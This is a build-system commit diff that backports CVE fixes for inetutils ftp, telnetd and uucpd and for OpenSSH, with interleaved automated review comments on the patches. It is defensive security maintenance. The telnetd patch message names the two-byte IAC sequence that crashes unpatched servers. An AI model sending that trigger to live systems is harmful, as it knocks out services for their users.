+ * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 29cfce35..fde7b9c9 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,10 +254,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+ dologin (pw, sap, salen);
+
+ if (setgid (pw->pw_gid) == -1)
+- {
+- fprintf (stderr, "setgid() failed");
+- return;
+- }
++ {
++ fprintf (stderr, "setgid() failed");
++ return;
++ }
+ #ifdef HAVE_INITGROUPS
+ initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -268,10 +268,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+ }
+
+ if (setuid (pw->pw_uid) == -1)
+- {
+- fprintf (stderr, "setuid() failed");
+- return;
+- }
++ {
++ fprintf (stderr, "setuid() failed");
++ return;
++ }
+
+ execl (uucico_location, "uucico", NULL);
+ perror ("uucico server: execl");
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
new file mode 100644
index 0000000000..54252d6bc7
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
@@ -0,0 +1,67 @@
+From 4e355804d57d5686defc363c70f81e6f58cd08f0 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Fri, 17 Dec 2021 21:52:18 -0800
+Subject: [PATCH] ftp: check that PASV/LSPV addresses match.
+
+* NEWS: Mention change.
+* ftp/ftp.c (initconn): Validate returned addresses.
+
+CVE: CVE-2021-40491
+
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd]
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ ftp/ftp.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ftp/ftp.c b/ftp/ftp.c
+index 9813586..7c72cb2 100644
+--- a/ftp/ftp.c
++++ b/ftp/ftp.c
+@@ -1344,6 +1344,13 @@ initconn (void)
+ uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr;
+ pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]);
+ }
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv4 */
+ else /* IPv6 */
+ {
+@@ -1374,6 +1381,13 @@ initconn (void)
+ pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]);
+ pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]);
+ }
++ if (data_addr_sa6->sin6_addr.s6_addr
++ != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv6 */
+ }
+ else /* !EPSV && !LPSV */
+@@ -1394,6 +1408,13 @@ initconn (void)
+ | ((a2 & 0xff) << 8) | (a3 & 0xff) );
+ data_addr_sa4->sin_port =
+ htons (((p0 & 0xff) << 8) | (p1 & 0xff));
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* PASV */
+ else
+ {
+--
+2.25.1
+
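Review bot: The IPv6 LPSV check compares `sin6_addr.s6_addr` with `!=`, but `s6_addr` is an array, so the expression compares the addresses of the two arrays and not their 16 bytes. The test is therefore true whenever `data_addr_sa6` and `hisctladdr` refer to different objects, which appears to be the case here, and every IPv6 LPSV reply would be reported as "Passive mode address mismatch". A byte comparison is needed: `if (memcmp (&data_addr_sa6->sin6_addr, &((struct sockaddr_in6 *) &hisctladdr)->sin6_addr, sizeof (struct in6_addr)) != 0)`. The two IPv4 checks compare scalar `s_addr` values and are fine; `initconn()` itself starts and ends outside the hunks.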
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
new file mode 100644
index 0000000000..da2da8da8a
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
@@ -0,0 +1,54 @@
+From eaae65aac967f9628787dca4a2501ca860bb6598 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Mon, 26 Sep 2022 22:05:07 +0200
+Subject: [PATCH] telnetd: Handle early IAC EC or IAC EL receipt
+
+Fix telnetd crash if the first two bytes of a new connection
+are 0xff 0xf7 (IAC EC) or 0xff 0xf8 (IAC EL).
+
+The problem was reported in:
+<https://pierrekim.github.io/blog/2022-08-24-2-byte-dos-freebsd-netbsd-telnetd-netkit-telnetd-inetutils-telnetd-kerberos-telnetd.html>.
+
+* NEWS: Mention fix.
+* telnetd/state.c (telrcv): Handle zero slctab[SLC_EC].sptr and
+zero slctab[SLC_EL].sptr.
+
+CVE: CVE-2022-39028
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=fae8263e467380483c28513c0e5fac143e46f94f]
+Signed-off-by: Minjae Kim<flowergom@gmail.com>
+---
+ telnetd/state.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/telnetd/state.c b/telnetd/state.c
+index 2184bca..7948503 100644
+--- a/telnetd/state.c
++++ b/telnetd/state.c
+@@ -314,15 +314,21 @@ telrcv (void)
+ case EC:
+ case EL:
+ {
+- cc_t ch;
++ cc_t ch = (cc_t) (_POSIX_VDISABLE);
+
+ DEBUG (debug_options, 1, printoption ("td: recv IAC", c));
+ ptyflush (); /* half-hearted */
+ init_termbuf ();
+ if (c == EC)
+- ch = *slctab[SLC_EC].sptr;
++ {
++ if (slctab[SLC_EC].sptr)
++ ch = *slctab[SLC_EC].sptr;
++ }
+ else
+- ch = *slctab[SLC_EL].sptr;
++ {
++ if (slctab[SLC_EL].sptr)
++ ch = *slctab[SLC_EL].sptr;
++ }
+ if (ch != (cc_t) (_POSIX_VDISABLE))
+ pty_output_byte ((unsigned char) ch);
+ break;
+--
+2.25.1
+
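Review bot: The new NULL checks on `slctab[SLC_EC].sptr` and `slctab[SLC_EL].sptr` in `telrcv()` have no comment, so the reason `ch` now starts as `_POSIX_VDISABLE` is recorded only in the commit message. A one-line comment above `if (c == EC)` would keep it with the code: `/* sptr may still be NULL if IAC EC/EL arrives at the very start of a connection; ch then stays disabled and nothing is written. */`. `telrcv()` starts and ends outside the hunk.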
diff --git a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
index cc9410b94e..3a68b34825 100644
--- a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
+++ b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
@@ -23,6 +23,10 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.gz \
file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \
file://0001-rcp-fix-to-work-with-large-files.patch \
file://fix-buffer-fortify-tfpt.patch \
+ file://CVE-2021-40491.patch \
+ file://CVE-2022-39028.patch \
+ file://0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch \
+ file://0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch \
"
SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52"
diff --git a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
index 5e4460045b..5213b28345 100644
--- a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
+++ b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Name Service Switch module for Multicast DNS (zeroconf) name resolution"
HOMEPAGE = "https://github.com/lathiat/nss-mdns"
+DESCRIPTION = "nss-mdns is a plugin for the GNU Name Service Switch (NSS) functionality of the GNU C Library (glibc) providing host name resolution via Multicast DNS (aka Zeroconf, aka Apple Rendezvous, aka Apple Bonjour), effectively allowing name resolution by common Unix/Linux programs in the ad-hoc mDNS domain .local."
SECTION = "libs"
LICENSE = "LGPLv2.1+"
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1"
DEPENDS = "avahi"
-SRC_URI = "git://github.com/lathiat/nss-mdns \
+SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \
"
SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae"
diff --git a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
index 0b0bbab168..a4030b7b32 100644
--- a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
+++ b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
@@ -1,13 +1,15 @@
SUMMARY = "Mobile Broadband Service Provider Database"
HOMEPAGE = "http://live.gnome.org/NetworkManager/MobileBroadband/ServiceProviders"
+DESCRIPTION = "Mobile Broadband Service Provider Database stores service provider specific information. When this Database is available the information can be fetched there"
SECTION = "network"
LICENSE = "PD"
LIC_FILES_CHKSUM = "file://COPYING;md5=87964579b2a8ece4bc6744d2dc9a8b04"
-SRCREV = "22b49d86fb7aded2c195a9d49e5924da696b3228"
-PV = "20190618"
+
+SRCREV = "aae7c68671d225e6d35224613d5b98192b9b2ffe"
+PV = "20230416"
PE = "1"
-SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https"
+SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=main"
S = "${WORKDIR}/git"
inherit autotools
diff --git a/meta/recipes-connectivity/neard/neard_0.16.bb b/meta/recipes-connectivity/neard/neard_0.16.bb
index 7c124a3c0b..dd0742f792 100644
--- a/meta/recipes-connectivity/neard/neard_0.16.bb
+++ b/meta/recipes-connectivity/neard/neard_0.16.bb
@@ -2,21 +2,22 @@ SUMMARY = "Linux NFC daemon"
DESCRIPTION = "A daemon for the Linux Near Field Communication stack"
HOMEPAGE = "http://01.org/linux-nfc"
LICENSE = "GPLv2"
+LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
+ file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
+ "
DEPENDS = "dbus glib-2.0 libnl"
-SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BP}.tar.xz \
+SRC_URI = "git://git.kernel.org/pub/scm/network/nfc/neard.git;protocol=git;branch=master \
file://neard.in \
file://Makefile.am-fix-parallel-issue.patch \
file://Makefile.am-do-not-ship-version.h.patch \
file://0001-Add-header-dependency-to-nciattach.o.patch \
"
-SRC_URI[md5sum] = "5c691fb7872856dc0d909c298bc8cb41"
-SRC_URI[sha256sum] = "eae3b11c541a988ec11ca94b7deab01080cd5b58cfef3ced6ceac9b6e6e65b36"
-LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
- file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
- "
+SRCREV = "949795024f7625420e93e288c56e194cb9a3e74a"
+
+S = "${WORKDIR}/git"
inherit autotools pkgconfig systemd update-rc.d
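Review bot: The new `SRC_URI` fetches with `protocol=git`, the unauthenticated and unencrypted git transport, while the other recipes touched in this commit are moved to `protocol=https`. `SRCREV` pins the commit, which limits what a tampered transfer could deliver, but this hunk also drops the tarball's `SRC_URI[sha256sum]` check, so the transport should not be weaker than it has to be. I would use `SRC_URI = "git://git.kernel.org/pub/scm/network/nfc/neard.git;protocol=https;branch=master \`.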
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
new file mode 100644
index 0000000000..3adb981fb4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
@@ -0,0 +1,97 @@
+From b3855ff053f5078ec3d3c653cdaedefaa5fc362d Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 05:23:03 +0000
+Subject: upstream: tweak the client hostkey preference ordering algorithm to
+
+prefer the default ordering if the user has a key that matches the
+best-preference default algorithm.
+
+feedback and ok markus@
+
+OpenBSD-Commit-ID: a92dd7d7520ddd95c0a16786a7519e6d0167d35f
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ sshconnect2.c | 41 ++++++++++++++++++++++++++++++++++++++---
+ 1 file changed, 38 insertions(+), 3 deletions(-)
+
+CVE: CVE-2020-14145
+Upstream-Status: Backport [https://anongit.mindrot.org/openssh.git/patch/?id=b3855ff053f5078ec3d3c653cdaedefaa5fc362d]
+Comment: Refreshed first hunk
+
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 347e348c..f64aae66 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: sshconnect2.c,v 1.320 2020/02/06 22:48:23 djm Exp $ */
++/* $OpenBSD: sshconnect2.c,v 1.326 2020/09/18 05:23:03 djm Exp $ */
+ /*
+ * Copyright (c) 2000 Markus Friedl. All rights reserved.
+ * Copyright (c) 2008 Damien Miller. All rights reserved.
+@@ -102,12 +102,25 @@ verify_host_key_callback(struct sshkey *hostkey, struct ssh *ssh)
+ return 0;
+ }
+
++/* Returns the first item from a comma-separated algorithm list */
++static char *
++first_alg(const char *algs)
++{
++ char *ret, *cp;
++
++ ret = xstrdup(algs);
++ if ((cp = strchr(ret, ',')) != NULL)
++ *cp = '\0';
++ return ret;
++}
++
+ static char *
+ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ {
+- char *oavail, *avail, *first, *last, *alg, *hostname, *ret;
++ char *oavail = NULL, *avail = NULL, *first = NULL, *last = NULL;
++ char *alg = NULL, *hostname = NULL, *ret = NULL, *best = NULL;
+ size_t maxlen;
+- struct hostkeys *hostkeys;
++ struct hostkeys *hostkeys = NULL;
+ int ktype;
+ u_int i;
+
+@@ -119,6 +132,26 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ for (i = 0; i < options.num_system_hostfiles; i++)
+ load_hostkeys(hostkeys, hostname, options.system_hostfiles[i]);
+
++ /*
++ * If a plain public key exists that matches the type of the best
++ * preference HostkeyAlgorithms, then use the whole list as is.
++ * Note that we ignore whether the best preference algorithm is a
++ * certificate type, as sshconnect.c will downgrade certs to
++ * plain keys if necessary.
++ */
++ best = first_alg(options.hostkeyalgorithms);
++ if (lookup_key_in_hostkeys_by_type(hostkeys,
++ sshkey_type_plain(sshkey_type_from_name(best)), NULL)) {
++ debug3("%s: have matching best-preference key type %s, "
++ "using HostkeyAlgorithms verbatim", __func__, best);
++ ret = xstrdup(options.hostkeyalgorithms);
++ goto out;
++ }
++
++ /*
++ * Otherwise, prefer the host key algorithms that match known keys
++ * while keeping the ordering of HostkeyAlgorithms as much as possible.
++ */
+ oavail = avail = xstrdup(options.hostkeyalgorithms);
+ maxlen = strlen(avail) + 1;
+ first = xmalloc(maxlen);
+@@ -159,6 +192,8 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ if (*first != '\0')
+ debug3("%s: prefer hostkeyalgs: %s", __func__, first);
+
++ out:
++ free(best);
+ free(first);
+ free(last);
+ free(hostname);
+--
+cgit v1.2.3
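Review bot: The comment on `first_alg()` does not say that the result is heap-allocated. The function returns an `xstrdup()` copy, and `order_hostkeyalgs()` depends on that by calling `free(best)` at `out:`. I would state the ownership in the comment: `/* Returns a newly allocated copy of the first item in a comma-separated algorithm list; the caller must free() it. */`. The body of `order_hostkeyalgs()` continues outside the hunks shown.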
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
new file mode 100644
index 0000000000..9fd7e932d1
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
@@ -0,0 +1,20 @@
+Description: fix double-free memory corruption in ssh-agent
+Author: Marc Deslauriers <marc.deslauriers@canonical.com>
+Origin: minimal fix for https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+CVE: CVE-2021-28041
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_8.2p1-4ubuntu0.3.debian.tar.xz]
+Comment: No change in any hunk
+
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -496,6 +496,7 @@ process_add_identity(SocketEntry *e)
+ goto err;
+ }
+ free(ext_name);
++ ext_name = NULL;
+ break;
+ default:
+ error("%s: Unknown constraint %d", __func__, ctype);
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
new file mode 100644
index 0000000000..bda896f581
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
@@ -0,0 +1,52 @@
+From a6414400ec94a17871081f7df24f910a6ee01b8b Mon Sep 17 00:00:00 2001
+From: Ali Abdallah <aabdallah@suse.de>
+Date: Wed, 24 Nov 2021 13:33:39 +0100
+Subject: [PATCH] CVE-2021-41617 fix
+
+backport of the following two upstream commits
+
+f3cbe43e28fe71427d41cfe3a17125b972710455
+bf944e3794eff5413f2df1ef37cddf96918c6bde
+
+CVE-2021-41617 failed to correctly initialise supplemental groups
+when executing an AuthorizedKeysCommand or AuthorizedPrincipalsCommand,
+where a AuthorizedKeysCommandUser or AuthorizedPrincipalsCommandUser
+directive has been set to run the command as a different user. Instead
+these commands would inherit the groups that sshd(8) was started with.
+---
+ auth.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+CVE: CVE-2021-41617
+Upstream-Status: Backport [https://bugzilla.suse.com/attachment.cgi?id=854015]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/auth.c b/auth.c
+index 163038f..a47b267 100644
+--- a/auth.c
++++ b/auth.c
+@@ -52,6 +52,7 @@
+ #include <limits.h>
+ #include <netdb.h>
+ #include <time.h>
++#include <grp.h>
+
+ #include "xmalloc.h"
+ #include "match.h"
+@@ -851,6 +852,13 @@ subprocess(const char *tag, struct passwd *pw, const char *command,
+ }
+ closefrom(STDERR_FILENO + 1);
+
++ if (geteuid() == 0 &&
++ initgroups(pw->pw_name, pw->pw_gid) == -1) {
++ error("%s: initgroups(%s, %u): %s", tag,
++ pw->pw_name, (u_int)pw->pw_gid, strerror(errno));
++ _exit(1);
++ }
++
+ /* Don't use permanently_set_uid() here to avoid fatal() */
+ if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) {
+ error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid,
+--
+2.26.2
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
new file mode 100644
index 0000000000..c899056337
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
@@ -0,0 +1,189 @@
+From f6213e03887237714eb5bcfc9089c707069f87c5 Mon Sep 17 00:00:00 2001
+From: Damien Miller <djm@mindrot.org>
+Date: Fri, 1 Oct 2021 16:35:49 +1000
+Subject: [PATCH 01/12] make OPENSSL_HAS_ECC checks more thorough
+
+ok dtucker
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/dee22129bbc61e25b1003adfa2bc584c5406ef2d]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11-client.c | 16 ++++++++--------
+ ssh-pkcs11.c | 26 +++++++++++++-------------
+ 2 files changed, 21 insertions(+), 21 deletions(-)
+
+diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
+index 8a0ffef..41114c7 100644
+--- a/ssh-pkcs11-client.c
++++ b/ssh-pkcs11-client.c
+@@ -163,7 +163,7 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ return (ret);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ const BIGNUM *rp, EC_KEY *ec)
+@@ -220,12 +220,12 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ sshbuf_free(msg);
+ return (ret);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ static RSA_METHOD *helper_rsa;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static EC_KEY_METHOD *helper_ecdsa;
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* redirect private key crypto operations to the ssh-pkcs11-helper */
+ static void
+@@ -233,10 +233,10 @@ wrap_key(struct sshkey *k)
+ {
+ if (k->type == KEY_RSA)
+ RSA_set_method(k->rsa, helper_rsa);
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ else if (k->type == KEY_ECDSA)
+ EC_KEY_set_method(k->ecdsa, helper_ecdsa);
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+ else
+ fatal("%s: unknown key type", __func__);
+ }
+@@ -247,7 +247,7 @@ pkcs11_start_helper_methods(void)
+ if (helper_rsa != NULL)
+ return (0);
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
+ unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
+ if (helper_ecdsa != NULL)
+@@ -257,7 +257,7 @@ pkcs11_start_helper_methods(void)
+ return (-1);
+ EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
+ EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
+ fatal("%s: RSA_meth_dup failed", __func__);
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index a302c79..b56a41b 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -78,7 +78,7 @@ struct pkcs11_key {
+
+ int pkcs11_interactive = 0;
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static void
+ ossl_error(const char *msg)
+ {
+@@ -89,7 +89,7 @@ ossl_error(const char *msg)
+ error("%s: libcrypto error: %.100s", __func__,
+ ERR_error_string(e, NULL));
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ int
+ pkcs11_init(int interactive)
+@@ -190,10 +190,10 @@ pkcs11_del_provider(char *provider_id)
+
+ static RSA_METHOD *rsa_method;
+ static int rsa_idx = 0;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static EC_KEY_METHOD *ec_key_method;
+ static int ec_key_idx = 0;
+-#endif
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* release a wrapped object */
+ static void
+@@ -492,7 +492,7 @@ pkcs11_rsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
+ return (0);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ /* openssl callback doing the actual signing operation */
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+@@ -604,7 +604,7 @@ pkcs11_ecdsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
+
+ return (0);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* remove trailing spaces */
+ static void
+@@ -679,7 +679,7 @@ pkcs11_key_included(struct sshkey ***keysp, int *nkeys, struct sshkey *key)
+ return (0);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static struct sshkey *
+ pkcs11_fetch_ecdsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ CK_OBJECT_HANDLE *obj)
+@@ -802,7 +802,7 @@ fail:
+
+ return (key);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ static struct sshkey *
+ pkcs11_fetch_rsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+@@ -910,7 +910,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ #endif
+ struct sshkey *key = NULL;
+ int i;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ int nid;
+ #endif
+ const u_char *cp;
+@@ -999,7 +999,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ key->type = KEY_RSA;
+ key->flags |= SSHKEY_FLAG_EXT;
+ rsa = NULL; /* now owned by key */
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ } else if (EVP_PKEY_base_id(evp) == EVP_PKEY_EC) {
+ if (EVP_PKEY_get0_EC_KEY(evp) == NULL) {
+ error("invalid x509; no ec key");
+@@ -1030,7 +1030,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ key->type = KEY_ECDSA;
+ key->flags |= SSHKEY_FLAG_EXT;
+ ec = NULL; /* now owned by key */
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+ } else {
+ error("unknown certificate key type");
+ goto out;
+@@ -1237,11 +1237,11 @@ pkcs11_fetch_keys(struct pkcs11_provider *p, CK_ULONG slotidx,
+ case CKK_RSA:
+ key = pkcs11_fetch_rsa_pubkey(p, slotidx, &obj);
+ break;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ case CKK_ECDSA:
+ key = pkcs11_fetch_ecdsa_pubkey(p, slotidx, &obj);
+ break;
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+ default:
+ /* XXX print key type? */
+ key = NULL;
+--
+2.41.0
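Review bot: In pkcs11_fetch_x509_pubkey() the widened guard around `int nid;` is still closed by a bare `#endif`, while every other guard touched in this patch gets the `/* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */` trailer. That declaration sits directly below another bare `#endif`, so the nesting is hard to follow; I would write `#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */` there as well. The function body lies outside the hunk.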
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
new file mode 100644
index 0000000000..25ba921869
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
@@ -0,0 +1,581 @@
+From 92cebfbcc221c9ef3f6bbb78da3d7699c0ae56be Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 14:03:45 +0000
+Subject: [PATCH 02/12] upstream: Separate ssh-pkcs11-helpers for each p11
+ module
+
+Make ssh-pkcs11-client start an independent helper for each provider,
+providing better isolation between modules and reliability if a single
+module misbehaves.
+
